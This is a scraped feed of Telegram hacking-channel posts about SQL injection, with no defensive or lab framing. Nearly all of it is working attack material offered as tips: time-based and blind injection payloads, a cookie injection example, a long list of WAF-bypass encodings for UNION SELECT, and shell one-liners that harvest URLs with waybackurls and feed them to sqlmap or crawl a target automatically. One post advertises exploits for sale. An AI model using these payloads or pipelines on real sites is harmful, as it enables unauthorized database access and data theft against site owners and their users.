Advanced SQL Injection Cheatsheet - A cheat sheet that contains advanced queries for SQL Injection of all types
Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
  
  Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
  
  GitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.
  A cheat sheet that contains advanced queries for SQL Injection of all types. - kleiton0x00/Advanced-SQL-Injection-Cheatsheet
❤6
  Time sleep sql injection ⚡️
Payload:
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6
  sql injection payload 
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3
  SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7
  Sql Injection Payload 
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
  Blind SQL Injection payload 
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1
  7 SQLs 
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%202 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥9❤🔥3👍2
  Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ 
📣  T.me/BugCod3 
📣  T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
    VIEW IN TELEGRAM
  ⚡7❤2🔥1💯1
  Bypass SQL union select
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
🔥11👍5❤🔥2⚡1❤1
  SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ 
📣  T.me/BugCod3 
📣  T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
    VIEW IN TELEGRAM
  ⚡8🔥3👍2❤1
  SQLMap from Waybackurls ⚡️
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6
  Do you know that sqlmap has its own crawler? Run in the background easily: 
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4❤🔥1👍1🔥1
  Sql Injection 
Payload :
Parameter:
#BugBounty #Tips #sql_injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ 
👤  T.me/BugCod3BOT 
📣  T.me/BugCod3
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'ZParameter:
cart/-10+payload#BugBounty #Tips #sql_injection
Please open Telegram to view this post
    VIEW IN TELEGRAM
  ⚡9❤4🔥3
  Sql injection Manual Bypass WAF 
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7👍2👎2❤1😁1
  Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5⚡1
  Media is too big
    VIEW IN TELEGRAM
  How to h4ck w3bsite with sqlm4p 
#Sql inj3ction
If you want more video more 3xploit pm to buy
💵 PM TO Buy : @Bvrce
#hack #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLarCyberLab
#Sql inj3ction
If you want more video more 3xploit pm to buy
💵 PM TO Buy : @Bvrce
#hack #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLarCyberLab
👍1
  